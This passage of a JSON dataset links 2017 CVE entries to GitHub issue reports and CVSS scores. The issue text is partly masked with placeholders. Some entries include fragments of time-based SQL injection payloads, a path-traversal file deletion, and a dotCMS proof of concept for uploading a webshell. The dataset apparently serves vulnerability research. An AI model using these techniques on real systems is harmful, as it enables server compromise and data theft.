ncolors can cause APITAG to allocate a anysize amount of memory, this may cause a memory exhaustion Reproducer: FILETAG Credit: APITAG of Venustech",
  5846. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  5847. "severity": "MEDIUM",
  5848. "baseScore": 6.5,
  5849. "impactScore": 3.6,
  5850. "exploitabilityScore": 2.8
  5851. },
  5852. {
  5853. "CVE_ID": "CVE-2017-11170",
  5854. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/472",
  5855. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/472",
  5856. "Repo_new": "imagemagick/imagemagick",
  5857. "Issue_Created_At": "2017-05-04T06:35:56Z",
  5858. "description": "memory exhaustion in APITAG APITAG NUMBERTAG magick identify $FILE When identify VST file, imagemagick will allocate memory to store data in function APITAG in coders ga.c (line NUMBERTAG PATHTAG if (image >storage_class == APITAG // line NUMBERTAG can be controlled { ... size_t one; // line NUMBERTAG one NUMBERTAG line NUMBERTAG image >colors=one APITAG colors,exception) == APITAG // line NUMBERTAG PATHTAG APITAG is diretly from VST file without checking in tga.c (line NUMBERTAG PATHTAG APITAG char) APITAG // can be controlled by modify VST file PATHTAG By review the founction code, APITAG max valid value is NUMBERTAG On NUMBERTAG bit os, size_t one will be NUMBERTAG bit, so image >colors can be overflow to NUMBERTAG On NUMBERTAG bit os, size_t one will be NUMBERTAG bit, so image >colors can be large as NUMBERTAG GB). Normally, this will not cause problem because image >storage_class is equal APITAG But image >storage_class is also can be controlled , it is assigned as follow PATHTAG if APITAG == APITAG || APITAG == APITAG || APITAG == APITAG || APITAG == APITAG // image_type can be controlled image APITAG PATHTAG image_type is diretly from VST file PATHTAG APITAG APITAG PATHTAG Memory allocation is earlly than the security checking PATHTAG APITAG >columns,image >rows,exception); // line NUMBERTAG PATHTAG So, modifying the image_type and bits_per_pixel can cause APITAG to allocate a anysize amount of memory, this may cause a memory exhaustion Reproducer: FILETAG Credit: APITAG of Venustech",
  5859. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5860. "severity": "HIGH",
  5861. "baseScore": 8.8,
  5862. "impactScore": 5.9,
  5863. "exploitabilityScore": 2.8
  5864. },
  5865. {
  5866. "CVE_ID": "CVE-2017-11183",
  5867. "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/2450",
  5868. "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/2450",
  5869. "Repo_new": "glpi-project/glpi",
  5870. "Issue_Created_At": "2017-07-12T04:45:10Z",
  5871. "description": "any file delete in FILETAG . CVETAG APITAG Vectors] to exploit vulnerability ,someone must login with a admin accounts, and request URLTAG the \"file\" can route to any file with ../ and it can delete any files on the server",
  5872. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:N/I:H/A:N",
  5873. "severity": "MEDIUM",
  5874. "baseScore": 4.9,
  5875. "impactScore": 3.6,
  5876. "exploitabilityScore": 1.2
  5877. },
  5878. {
  5879. "CVE_ID": "CVE-2017-11184",
  5880. "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/2449",
  5881. "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/2449",
  5882. "Repo_new": "glpi-project/glpi",
  5883. "Issue_Created_At": "2017-07-12T04:40:25Z",
  5884. "description": "SQL injection in FILETAG . CVETAG APITAG Vectors] to exploit vulnerability ,someone must login with a admin accounts, and request URLTAG and the \"start\" has sql injection whit poc NUMBERTAG PROCEDURE analyse((select APITAG > if NUMBERTAG true) the response will get after NUMBERTAG s , if NUMBERTAG false) the response will get right now",
  5885. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5886. "severity": "CRITICAL",
  5887. "baseScore": 9.8,
  5888. "impactScore": 5.9,
  5889. "exploitabilityScore": 3.9
  5890. },
  5891. {
  5892. "CVE_ID": "CVE-2017-11188",
  5893. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/509",
  5894. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/509",
  5895. "Repo_new": "imagemagick/imagemagick",
  5896. "Issue_Created_At": "2017-06-08T12:27:43Z",
  5897. "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE ''' APITAG '''",
  5898. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  5899. "severity": "HIGH",
  5900. "baseScore": 7.5,
  5901. "impactScore": 3.6,
  5902. "exploitabilityScore": 3.9
  5903. },
  5904. {
  5905. "CVE_ID": "CVE-2017-11310",
  5906. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/517",
  5907. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/517",
  5908. "Repo_new": "imagemagick/imagemagick",
  5909. "Issue_Created_At": "2017-06-22T03:21:28Z",
  5910. "description": "memory leak in read_user_chunk_callback in png.c. Version: APITAG NUMBERTAG Q NUMBERTAG The read_user_chunk_callback function in png.c allows attackers to cause a denial of service (memory leak) via a small crafted png file. ERRORTAG testcase CODETAG Credit: APITAG of Venustech",
  5911. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  5912. "severity": "HIGH",
  5913. "baseScore": 8.8,
  5914. "impactScore": 5.9,
  5915. "exploitabilityScore": 2.8
  5916. },
  5917. {
  5918. "CVE_ID": "CVE-2017-11329",
  5919. "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/2456",
  5920. "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/2456",
  5921. "Repo_new": "glpi-project/glpi",
  5922. "Issue_Created_At": "2017-07-12T14:16:12Z",
  5923. "description": "NUMBERTAG SQL injection in FILETAG . ji. EMAILTAG .cn I have send the detail of vulnerability to your email. Please check.",
  5924. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5925. "severity": "CRITICAL",
  5926. "baseScore": 9.8,
  5927. "impactScore": 5.9,
  5928. "exploitabilityScore": 3.9
  5929. },
  5930. {
  5931. "CVE_ID": "CVE-2017-11348",
  5932. "Issue_Url_old": "https://github.com/OctopusDeploy/Issues/issues/3654",
  5933. "Issue_Url_new": "https://github.com/octopusdeploy/issues/issues/3654",
  5934. "Repo_new": "octopusdeploy/issues",
  5935. "Issue_Created_At": "2017-07-11T02:42:59Z",
  5936. "description": "Validate APITAG in uploaded packages. source: URLTAG",
  5937. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:H/A:N",
  5938. "severity": "MEDIUM",
  5939. "baseScore": 5.7,
  5940. "impactScore": 3.6,
  5941. "exploitabilityScore": 2.1
  5942. },
  5943. {
  5944. "CVE_ID": "CVE-2017-11352",
  5945. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/502",
  5946. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/502",
  5947. "Repo_new": "imagemagick/imagemagick",
  5948. "Issue_Created_At": "2017-05-31T08:24:16Z",
  5949. "description": "rle.c: operand/opcode variables copy & paste confusion in latest commit. Talking about NUMBERTAG fdf9ea commit.",
  5950. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  5951. "severity": "MEDIUM",
  5952. "baseScore": 6.5,
  5953. "impactScore": 3.6,
  5954. "exploitabilityScore": 2.8
  5955. },
  5956. {
  5957. "CVE_ID": "CVE-2017-11353",
  5958. "Issue_Url_old": "https://github.com/TheLocehiliosan/yadm/issues/74",
  5959. "Issue_Url_new": "https://github.com/thelocehiliosan/yadm/issues/74",
  5960. "Repo_new": "thelocehiliosan/yadm",
  5961. "Issue_Created_At": "2017-07-14T16:26:00Z",
  5962. "description": "Create private .ssh and .gnupg directories prior to merge (during clone). As referenced in Debian NUMBERTAG CVETAG , permissions on APITAG and APITAG directories are restricted _after_ an initial clone is complete. Git employs the user's umask to set permissions for any files/directories created. If APITAG or APITAG directories already exist with restricted permissions prior to cloning, the permissions will not be changed. Git only affects the permissions of directories that do not already exist. In practice this race condition does not pose a problem assuming the encryption feature is used for confidential data. For example, suppose a user wants to manage a APITAG and APITAG . Also suppose the APITAG is limited configuration data only, and the APITAG is their private key. If APITAG is included using the encryption function the following scenarios are possible: If APITAG already exists and is secured During the clone APITAG permissions are not changed (remain secure) If APITAG does not yet exist During the clone APITAG and APITAG will be created with the default umask (at this point no private data is exposed) After the clone permissions are restricted yadm decrypt is run (either by the user or via bootstrap) and the APITAG is put into the APITAG . APITAG 's permissions will already be restricted at this point Regardless, I plan to update clone operations. If there are files under locations APITAG or APITAG and those paths do not yet exist (an initial clone), I will create empty directories and secure them first. This should mitigate any concerns about a race condition. However, I don't think there is any effective problem as it stands today.",
  5963. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N",
  5964. "severity": "MEDIUM",
  5965. "baseScore": 5.9,
  5966. "impactScore": 3.6,
  5967. "exploitabilityScore": 2.2
  5968. },
  5969. {
  5970. "CVE_ID": "CVE-2017-11354",
  5971. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/4",
  5972. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/4",
  5973. "Repo_new": "fiyocms/fiyocms",
  5974. "Issue_Created_At": "2017-07-15T19:34:26Z",
  5975. "description": "SQL Injection in tag add function. There is an sql injection in tag adding function, its location is in PATHTAG No filter has been used in the $_POST FILETAG ERRORTAG In the database insert function, there is no filter function either, just add a couple of \" beside the tag name. So when we update the tag name or add a tag name there is always the problem of sql injection. URL: PATHTAG DATA: APITAG We need a account to do this thing. Discover: Chaitin Technology",
  5976. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  5977. "severity": "CRITICAL",
  5978. "baseScore": 9.8,
  5979. "impactScore": 5.9,
  5980. "exploitabilityScore": 3.9
  5981. },
  5982. {
  5983. "CVE_ID": "CVE-2017-11360",
  5984. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/518",
  5985. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/518",
  5986. "Repo_new": "imagemagick/imagemagick",
  5987. "Issue_Created_At": "2017-06-22T15:26:04Z",
  5988. "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE ERRORTAG APITAG APITAG APITAG Because the loop count can be controlled, so it can cause APITAG spend a lot of time to process a crafted imagefile, even if the imagefile is very small. Credit: APITAG of Venustech",
  5989. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  5990. "severity": "MEDIUM",
  5991. "baseScore": 6.5,
  5992. "impactScore": 3.6,
  5993. "exploitabilityScore": 2.8
  5994. },
  5995. {
  5996. "CVE_ID": "CVE-2017-11366",
  5997. "Issue_Url_old": "https://github.com/Codiad/Codiad/issues/1011",
  5998. "Issue_Url_new": "https://github.com/codiad/codiad/issues/1011",
  5999. "Repo_new": "codiad/codiad",
  6000. "Issue_Created_At": "2017-07-25T06:41:00Z",
  6001. "description": "Security issues, Remote Code Execution Vulnerability. Hacker can get APITAG server privileges by the vulnerability, I have send you an email about that, but did not receive a reply. more details , please contact my mailbox",
  6002. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  6003. "severity": "CRITICAL",
  6004. "baseScore": 9.8,
  6005. "impactScore": 5.9,
  6006. "exploitabilityScore": 3.9
  6007. },
  6008. {
  6009. "CVE_ID": "CVE-2017-11367",
  6010. "Issue_Url_old": "https://github.com/Ed-von-Schleck/shoco/issues/28",
  6011. "Issue_Url_new": "https://github.com/ed-von-schleck/shoco/issues/28",
  6012. "Repo_new": "ed-von-schleck/shoco",
  6013. "Issue_Created_At": "2017-02-22T01:13:49Z",
  6014. "description": "global buffer overflow in APITAG Compiled with AFL with APITAG like APITAG and then run like APITAG which produces this: ERRORTAG FILETAG",
  6015. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  6016. "severity": "HIGH",
  6017. "baseScore": 7.5,
  6018. "impactScore": 3.6,
  6019. "exploitabilityScore": 3.9
  6020. },
  6021. {
  6022. "CVE_ID": "CVE-2017-11412",
  6023. "Issue_Url_old": "https://github.com/FiyoCMS/FiyoCMS/issues/5",
  6024. "Issue_Url_new": "https://github.com/fiyocms/fiyocms/issues/5",
  6025. "Repo_new": "fiyocms/fiyocms",
  6026. "Issue_Created_At": "2017-07-17T05:49:21Z",
  6027. "description": "Many sq linjection in fiyo cms NUMBERTAG In PATHTAG $_POST['id'] has no filters and $_POST['art_title'] just filter the double quote. So we can inject into this SQL statement. Because it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. POST PATHTAG HTTP NUMBERTAG Referer: URLTAG id=\" and sleep NUMBERTAG art_title NUMBERTAG In PATHTAG $_POST paraments has some meanless filter. So we can inject into this SQL statement. Because it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. POST PATHTAG Referer: URLTAG send=true&name NUMBERTAG or sleep NUMBERTAG or NUMBERTAG email= EMAILTAG APITAG NUMBERTAG In PATHTAG $_GET[cat], $_GET[user], $_GET[level], APITAG are all no filters at all. So we can inject into this SQL statement. Because it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. GET PATHTAG APITAG Referer: URLTAG NUMBERTAG In PATHTAG $_GET['id'] has no filters and it will be inject into SQL APITAG it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. GET PATHTAG Referer: URLTAG NUMBERTAG In PATHTAG $_GET['id'] has no filters and it will be inject into SQL APITAG it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. GET PATHTAG Referer: URLTAG NUMBERTAG In PATHTAG APITAG has no filters and they will be inject into SQL APITAG it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. In add category and edit category they are the similar problems. In add article and edit article there are so many paraments have been not filtered. The attack vector is so simple and too many attact vector could be use. So I will not write the detail NUMBERTAG In PATHTAG $_GET['id'] has no filters and it will be inject into SQL APITAG it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. GET PATHTAG Referer: URLTAG NUMBERTAG In PATHTAG In edit comment component: $_POST[comment], $_POST[name], $_POST[web], $_POST[email], $_POST[status], $_POST[id] has no filters and it will be inject into SQL APITAG it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. In enable comment and disable comment component: $_REQUEST['id'] has no filters and it will be inject into SQL APITAG it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. The attack vector is so simple and too many attact vector could be use. So I will not write the detail. Discoverer: Valo & Melody from Chaitin Tech",
  6028. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  6029. "severity": "CRITICAL",
  6030. "baseScore": 9.8,
  6031. "impactScore": 5.9,
  6032. "exploitabilityScore": 3.9
  6033. },
  6034. {
  6035. "CVE_ID": "CVE-2017-11444",
  6036. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/479",
  6037. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/479",
  6038. "Repo_new": "intelliants/subrion",
  6039. "Issue_Created_At": "2017-07-02T03:06:57Z",
  6040. "description": "Subrion cms NUMBERTAG sql injection in FILETAG . description Subrion cms NUMBERTAG has a sql injection because $GET details critical code in FILETAG , $GET is passed to APITAG with no checking APITAG APITAG in PATHTAG ERRORTAG There is a APITAG in APITAG it has the code, it's purpose is retrive parameter from $GET: ERRORTAG There is a APITAG in APITAG it has the code, it's purpose is call a user function: ERRORTAG There is a APITAG in APITAG it has the code, it's purpose is to construct a key value array string from parameter: ERRORTAG At last, self::ITEM_SEARCH_METHOD is referenced to APITAG PATHTAG ), it has the code, it's purpose it to excute sql, and $stmt is can be controlled as it is construct from client side data $GET: ERRORTAG So there exist a sql injection vulnerability. POC: get database user via sql injection URLTAG IMAGE: sql1",
  6041. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  6042. "severity": "CRITICAL",
  6043. "baseScore": 9.8,
  6044. "impactScore": 5.9,
  6045. "exploitabilityScore": 3.9
  6046. },
  6047. {
  6048. "CVE_ID": "CVE-2017-11445",
  6049. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/480",
  6050. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/480",
  6051. "Repo_new": "intelliants/subrion",
  6052. "Issue_Created_At": "2017-07-02T03:34:12Z",
  6053. "description": "Subrion cms NUMBERTAG sql injection in FILETAG . Subrion cms NUMBERTAG sql injection in FILETAG description Subrion cms NUMBERTAG has a sql injection because $GET details critical code in FILETAG , $POST is passed to APITAG with no checking ERRORTAG APITAG in PATHTAG ERRORTAG There is a checking APITAG it means that anonymous user will be blocked as \"return false\", but any registered user will continue. So APITAG will be passed to row, and it is from $_POST FILETAG sleep NUMBERTAG url: FILETAG postdata: action=delete APITAG APITAG username&file NUMBERTAG time echo: FILETAG Credit: APITAG of APITAG",
  6054. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  6055. "severity": "CRITICAL",
  6056. "baseScore": 9.8,
  6057. "impactScore": 5.9,
  6058. "exploitabilityScore": 3.9
  6059. },
  6060. {
  6061. "CVE_ID": "CVE-2017-11446",
  6062. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/537",
  6063. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/537",
  6064. "Repo_new": "imagemagick/imagemagick",
  6065. "Issue_Created_At": "2017-07-04T15:25:07Z",
  6066. "description": "endless loop in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE Here is the critical code ERRORTAG in the while loop, only two condition can cause loop exit NUMBERTAG APITAG != EOF' is false this statement will never be false, because APITAG must be NUMBERTAG or NUMBERTAG never be NUMBERTAG EOF NUMBERTAG if NUMBERTAG ff) && (y NUMBERTAG is true this statement will never be true, because small crafted file will cause: a) APITAG to set NUMBERTAG and b) APITAG to set y NUMBERTAG So a crafted will cause endless loop. testcase: URLTAG Credit: APITAG of Venustech",
  6067. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6068. "severity": "MEDIUM",
  6069. "baseScore": 6.5,
  6070. "impactScore": 3.6,
  6071. "exploitabilityScore": 2.8
  6072. },
  6073. {
  6074. "CVE_ID": "CVE-2017-11447",
  6075. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/556",
  6076. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/556",
  6077. "Repo_new": "imagemagick/imagemagick",
  6078. "Issue_Created_At": "2017-07-09T21:57:23Z",
  6079. "description": "Comment about commit URLTAG Could you comment and give a statement about security about this commit ?",
  6080. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6081. "severity": "MEDIUM",
  6082. "baseScore": 6.5,
  6083. "impactScore": 3.6,
  6084. "exploitabilityScore": 2.8
  6085. },
  6086. {
  6087. "CVE_ID": "CVE-2017-11466",
  6088. "Issue_Url_old": "https://github.com/dotCMS/core/issues/12131",
  6089. "Issue_Url_new": "https://github.com/dotcms/core/issues/12131",
  6090. "Repo_new": "dotcms/core",
  6091. "Issue_Created_At": "2017-07-18T01:34:17Z",
  6092. "description": "APITAG /servlets/ajax_file_upload Arbitrary File Upload Vulnerability. ========================== Advisory: APITAG /servlets/ajax_file_upload Arbitrary File Upload Vulnerability Author: M3 MENTIONTAG From APITAG Security Lab Affected Version NUMBERTAG the latest version ========================== Vulnerability Description ========================== Recetly, I found an Arbitrary File Upload Vulnerability in APITAG program, APITAG is widely used in many companies. Vulnerable cgi: PATHTAG private void APITAG session, APITAG request, APITAG response) throws ERRORTAG { String APITAG = null; APITAG listener = null; try { String APITAG = \"\"; listener = new APITAG APITAG factory = new APITAG APITAG = APITAG Enumeration params = APITAG APITAG + APITAG APITAG APITAG upload = new APITAG List items = APITAG boolean ERRORTAG = false; APITAG = false; String APITAG = null; if APITAG { APITAG = APITAG User user = APITAG if APITAG || APITAG { throw new APITAG not upload File. Invalid User\"); } } else { throw new APITAG not upload File. Invalid User\"); } for APITAG i = APITAG APITAG { APITAG APITAG = APITAG if APITAG { if APITAG NUMBERTAG L) { APITAG = true; } if APITAG { APITAG = APITAG APITAG NUMBERTAG else { APITAG = APITAG } APITAG = APITAG File APITAG = new APITAG + APITAG + APITAG + APITAG + APITAG if APITAG { throw new ERRORTAG APITAG or Path\"); } if APITAG { APITAG } File dest = new APITAG + APITAG + APITAG if APITAG { APITAG } APITAG APITAG } } if APITAG { APITAG = \"\"; } if ERRORTAG { APITAG null); } else { APITAG APITAG not process uploaded file. Please see log for details.\"); } } catch ERRORTAG e) { APITAG APITAG + APITAG APITAG APITAG APITAG APITAG } } APITAG can be controlled through paramter APITAG the upload data is not filtered and the uploaded path can be user defined\uff0cso attacker with the administrator authority can upload evil jsp webshell file to control the whole web site or even the web server. ========================== POC && EXP NUMBERTAG Login as administrator NUMBERTAG POST PATHTAG HTTP NUMBERTAG Host: APITAG Accept Encoding: gzip, deflate Content Type: multipart/form data; boundary NUMBERTAG Cookie: your own cookies Connection: close Content Length NUMBERTAG Content Disposition: form data; name=\"xxx\"; APITAG APITAG NUMBERTAG shell is : FILETAG Attension: In some other cases: APITAG , then shell will be in PATHTAG like this: FILETAG , APITAG is your userid, even if you do not know your userid, you can bruteforce the number behind ' APITAG .",
  6093. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  6094. "severity": "HIGH",
  6095. "baseScore": 7.2,
  6096. "impactScore": 5.9,
  6097. "exploitabilityScore": 1.2
  6098. },
  6099. {
  6100. "CVE_ID": "CVE-2017-11474",
  6101. "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/2475",
  6102. "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/2475",
  6103. "Repo_new": "glpi-project/glpi",
  6104. "Issue_Created_At": "2017-07-18T06:22:47Z",
  6105. "description": "NUMBERTAG SQL injection in FILETAG . ji. EMAILTAG .cn I have send the detail of \"SQL injection in APITAG to your email. Please check.",
  6106. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  6107. "severity": "CRITICAL",
  6108. "baseScore": 9.8,
  6109. "impactScore": 5.9,
  6110. "exploitabilityScore": 3.9
  6111. },
  6112. {
  6113. "CVE_ID": "CVE-2017-11475",
  6114. "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/2476",
  6115. "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/2476",
  6116. "Repo_new": "glpi-project/glpi",
  6117. "Issue_Created_At": "2017-07-18T07:40:16Z",
  6118. "description": "NUMBERTAG SQL injection in FILETAG . ji. EMAILTAG .cn I have send the detail of \"SQL injection in APITAG to your email. Please check.",
  6119. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  6120. "severity": "HIGH",
  6121. "baseScore": 8.8,
  6122. "impactScore": 5.9,
  6123. "exploitabilityScore": 2.8
  6124. },
  6125. {
  6126. "CVE_ID": "CVE-2017-11478",
  6127. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/528",
  6128. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/528",
  6129. "Repo_new": "imagemagick/imagemagick",
  6130. "Issue_Created_At": "2017-06-24T15:03:00Z",
  6131. "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE Here is the critical code ERRORTAG a crafted file will cause this loop endless. testcase: URLTAG Credit: APITAG of Venustech",
  6132. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6133. "severity": "MEDIUM",
  6134. "baseScore": 6.5,
  6135. "impactScore": 3.6,
  6136. "exploitabilityScore": 2.8
  6137. },
  6138. {
  6139. "CVE_ID": "CVE-2017-11501",
  6140. "Issue_Url_old": "https://github.com/NixOS/nixpkgs/issues/27506",
  6141. "Issue_Url_new": "https://github.com/nixos/nixpkgs/issues/27506",
  6142. "Repo_new": "nixos/nixpkgs",
  6143. "Issue_Created_At": "2017-07-19T19:34:44Z",
  6144. "description": "Enabling TLS in APITAG disables peer checknig. If someone enables TLS in APITAG our module turns off TLS peer checking. This must not be the default behavior, and should be changed ASAP. Not sure if we can apply this to stable or not. URLTAG or pinned for time: URLTAG",
  6145. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  6146. "severity": "MEDIUM",
  6147. "baseScore": 5.9,
  6148. "impactScore": 3.6,
  6149. "exploitabilityScore": 2.2
  6150. },
  6151. {
  6152. "CVE_ID": "CVE-2017-11505",
  6153. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/526",
  6154. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/526",
  6155. "Repo_new": "imagemagick/imagemagick",
  6156. "Issue_Created_At": "2017-06-24T14:52:00Z",
  6157. "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE Here is the critical code ERRORTAG length can be controlled as follow: APITAG length is NUMBERTAG bit, so the loop can be very large, and cause a lot of failed I/O testcase: URLTAG Credit: APITAG of Venustech",
  6158. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6159. "severity": "MEDIUM",
  6160. "baseScore": 6.5,
  6161. "impactScore": 3.6,
  6162. "exploitabilityScore": 2.8
  6163. },
  6164. {
  6165. "CVE_ID": "CVE-2017-11522",
  6166. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/586",
  6167. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/586",
  6168. "Repo_new": "imagemagick/imagemagick",
  6169. "Issue_Created_At": "2017-07-18T18:31:46Z",
  6170. "description": "Null Point reference in APITAG Crash Link : URLTAG Trigger Command : ./magick convert APITAG output.mng Crash Detail : ERRORTAG",
  6171. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6172. "severity": "MEDIUM",
  6173. "baseScore": 6.5,
  6174. "impactScore": 3.6,
  6175. "exploitabilityScore": 2.8
  6176. },
  6177. {
  6178. "CVE_ID": "CVE-2017-11523",
  6179. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/591",
  6180. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/591",
  6181. "Repo_new": "imagemagick/imagemagick",
  6182. "Issue_Created_At": "2017-07-19T15:25:18Z",
  6183. "description": "endless loop in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick convert cpu APITAG FILETAG Here is the critical code ERRORTAG If text image file only contains APITAG line, it will cause APITAG to infinite loop. testcase: URLTAG Credit: APITAG of Venustech",
  6184. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6185. "severity": "MEDIUM",
  6186. "baseScore": 6.5,
  6187. "impactScore": 3.6,
  6188. "exploitabilityScore": 2.8
  6189. },
  6190. {
  6191. "CVE_ID": "CVE-2017-11524",
  6192. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/506",
  6193. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/506",
  6194. "Repo_new": "imagemagick/imagemagick",
  6195. "Issue_Created_At": "2017-06-04T10:19:05Z",
  6196. "description": "assertion failed in APITAG On version: APITAG NUMBERTAG a crafted file revealed an assertion failure in blob.c. CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6197. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6198. "severity": "MEDIUM",
  6199. "baseScore": 6.5,
  6200. "impactScore": 3.6,
  6201. "exploitabilityScore": 2.8
  6202. },
  6203. {
  6204. "CVE_ID": "CVE-2017-11525",
  6205. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/519",
  6206. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/519",
  6207. "Repo_new": "imagemagick/imagemagick",
  6208. "Issue_Created_At": "2017-06-23T11:55:45Z",
  6209. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE When identify CIN file that contains User defined data, imagemagick will allocate memory to store the data in function APITAG in coders\\inc.c Here is the critical code: ERRORTAG APITAG can be controlled as follow: APITAG There is a security checking in the function APITAG but it is in line NUMBERTAG so IM can not control the memory usage ERRORTAG Here is my FILETAG to limit memory usage APITAG And here is my real memory usage: CODETAG testcase: URLTAG Credit: APITAG of Venustech",
  6210. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6211. "severity": "MEDIUM",
  6212. "baseScore": 6.5,
  6213. "impactScore": 3.6,
  6214. "exploitabilityScore": 2.8
  6215. },
  6216. {
  6217. "CVE_ID": "CVE-2017-11526",
  6218. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/527",
  6219. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/527",
  6220. "Repo_new": "imagemagick/imagemagick",
  6221. "Issue_Created_At": "2017-06-24T14:55:35Z",
